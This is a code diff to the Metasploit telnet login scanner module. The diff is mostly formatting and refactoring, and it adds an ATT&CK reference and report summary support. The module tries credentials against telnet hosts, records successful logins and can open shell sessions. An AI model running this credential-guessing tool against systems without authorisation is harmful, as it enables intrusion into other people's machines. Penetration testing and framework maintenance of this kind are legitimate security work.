@@ -13,23 +13,23 @@ class MetasploitModule < Msf::Auxiliary
   include Msf::Auxiliary::Scanner
   include Msf::Auxiliary::CommandShell
   include Msf::Sessions::CreateSessionOptions
+  include Msf::Auxiliary::ReportSummary
 
   def initialize
     super(
-      'Name'        => 'Telnet Login Check Scanner',
-      #
+      'Name' => 'Telnet Login Check Scanner',
       'Description' => %q{
         This module will test a telnet login on a range of machines and
         report successful logins.  If you have loaded a database plugin
         and connected to a database this module will record successful
         logins and hosts so you can track your access.
       },
-      'Author'      => 'egypt',
-      'References'  =>
-        [
-          [ 'CVE', '1999-0502'] # Weak password
-        ],
-      'License'     => MSF_LICENSE
+      'Author' => 'egypt',
+      'References' => [
+        [ 'CVE', '1999-0502'], # Weak password
+        [ 'ATT&CK', Mitre::Attack::Technique::T1021_REMOTE_SERVICES ]
+      ],
+      'License' => MSF_LICENSE
     )
 
     register_advanced_options(
@@ -38,8 +38,6 @@ class MetasploitModule < Msf::Auxiliary
       ], self.class
     )
 
-    deregister_options('PASSWORD_SPRAY')
-
     @no_pass_prompt = []
   end
 
@@ -48,11 +46,12 @@ class MetasploitModule < Msf::Auxiliary
 
   def run_host(ip)
     cred_collection = build_credential_collection(
-        username: datastore['USERNAME'],
-        password: datastore['PASSWORD']
+      username: datastore['USERNAME'],
+      password: datastore['PASSWORD']
     )
 
     scanner = Metasploit::Framework::LoginScanner::Telnet.new(
+      configure_login_scanner(
         host: ip,
         port: rport,
         proxies: datastore['PROXIES'],
@@ -72,13 +71,14 @@ class MetasploitModule < Msf::Auxiliary
         ssl_cipher: datastore['SSLCipher'],
         local_port: datastore['CPORT'],
         local_host: datastore['CHOST']
+      )
     )
 
     scanner.scan! do |result|
       credential_data = result.to_h
       credential_data.merge!(
-          module_fullname: self.fullname,
-          workspace_id: myworkspace_id
+        module_fullname: self.fullname,
+        workspace_id: myworkspace_id
       )
       if result.success?
         credential_data[:private_type] = :password
@@ -86,7 +86,7 @@ class MetasploitModule < Msf::Auxiliary
         credential_data[:core] = credential_core
         create_credential_login(credential_data)
         print_good "#{ip}:#{rport} - Login Successful: #{result.credential}"
-        start_telnet_session(ip,rport,result.credential.public,result.credential.private,scanner) if datastore['CreateSession']
+        start_telnet_session(ip, rport, result.credential.public, result.credential.private, scanner) if datastore['CreateSession']
       else
         invalidate_login(credential_data)
         vprint_error "#{ip}:#{rport} - LOGIN FAILED: #{result.credential} (#{result.status}: #{result.proof})"
@@ -99,10 +99,10 @@ class MetasploitModule < Msf::Auxiliary
     print_status "Attempting to start session #{host}:#{port} with #{user}:#{pass}"
     merge_me = {
       'USERPASS_FILE' => nil,
-      'USER_FILE'     => nil,
-      'PASS_FILE'     => nil,
-      'USERNAME'      => user,
-      'PASSWORD'      => pass
+      'USER_FILE' => nil,
+      'PASS_FILE' => nil,
+      'USERNAME' => user,
+      'PASSWORD' => pass
     }
 
     start_session(self, "TELNET #{user}:#{pass} (#{host}:#{port})", merge_me, true, scanner.sock)
